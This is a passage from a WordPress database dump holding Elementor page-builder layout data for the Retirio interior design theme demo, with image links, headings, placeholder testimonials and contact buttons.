flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(1612,4619,'_elementor_page_assets','a:1:{s:6:\"styles\";a:16:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";i:15;s:12:\"e-animations\";}}'),(1625,4622,'_wp_page_template','elementor_header_footer'),(1626,4622,'_elementor_edit_mode','builder'),(1627,4622,'_elementor_template_type','wp-page'),(1628,4622,'_elementor_version','3.6.6'),(1629,4622,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-get-to-know-us.jpg\",\"id\":710,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Get to know us\",\"title\":\"Most experienced architects & designers\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"There are certain attributes of a profession and one has to catch hold of them in order to work efficiently and grow in that business. I share my experience as an interior designer, a profession of great esthetic value and charm.\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"f3caa1a\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\"},\"elements\":[{\"id\":\"697046f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20},\"elements\":[{\"id\":\"4b2c591\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_element_width\":\"auto\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"_border_color\":\"#E3B25A\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"9b875c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":79.92,\"space_between_widgets\":10},\"elements\":[{\"id\":\"1150f91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Mike Hardson\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h3\",\"typography_font_family\":\"Reey\",\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"23ae2ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"CO - FOUNDER\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8e90de\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5b19198\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d460dea\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking about retirio\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"da0b416\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"11f956f\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"d232423\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#E3B25A\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8056628\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\",\"_id\":\"51a9c88\"}],\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9c560b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"63f0bcf\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9b446cc\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"94218cd\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9ac0b32\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"f80af3e\"}],\"background_item_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"-15\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"bounceInUp\",\"_animation_tablet\":\"none\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"dot_control\":\"yes\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges in deploying\\ninterior design applications\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or call: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"+ 1800-111-543 \",\"phone_address\":\"1800111543\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 